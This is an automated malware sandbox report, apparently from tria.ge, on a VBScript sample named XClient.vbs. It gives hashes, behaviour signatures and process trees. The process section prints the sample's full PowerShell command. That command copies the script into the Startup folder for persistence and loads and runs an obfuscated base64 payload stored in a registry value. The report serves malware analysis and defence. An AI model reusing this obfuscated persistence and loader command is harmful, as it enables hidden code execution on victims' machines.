Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
25/06/2024, 18:06
Static task
static1
Behavioral task
behavioral1
Sample
XClient.vbs
Resource
win7-20240419-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
XClient.vbs
Resource
win10v2004-20240508-en
20 signatures
150 seconds
General
-
Target
XClient.vbs
-
Size
51KB
-
MD5
b2d3d950c164eac3905adf7449bbc102
-
SHA1
bfa01bfaa12aefce0bc8f7468ce788d78623c56d
-
SHA256
79ba69baace5e2b30cdc18e8ab462692e3337640f52f532743ffb2a52c281694
-
SHA512
6032364e7b7e107f0813eee20304ec31e65747b10174fba9d703d20c010c8785df515a0789f8e813484ae7d09e972100b2dd08df46dcb0844e9911feddadab74
-
SSDEEP
1536:daxTfSWi9SkelLyAPh0voJKfI2rygScsddWZrv+Va:0xTfk9reVUvWII2oJdWZT+Va
Score
3/10
Malware Config
Signatures
-
pid Process 3004 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2084 wrote to memory of 3004 2084 WScript.exe 28 PID 2084 wrote to memory of 3004 2084 WScript.exe 28 PID 2084 wrote to memory of 3004 2084 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\XClient.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\XClient.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.vbs'; $possessiveness = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $possessiveness = -join $possessiveness[-1..-$possessiveness.Length];[<##>AppDomain<##>]::<##>('merelsurrentDomain'.replace('merels','C'))<##>.<##>('liquationoad'.replace('liquation','L'))([Convert]::FromBase64String($possessiveness))<##>.<##>('microzoarianntryPoint'.replace('microzoarian','E'))<##>.<##>('Inconfrontmentoke'.replace('confrontment','v'))($Null,$Null)<##>;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-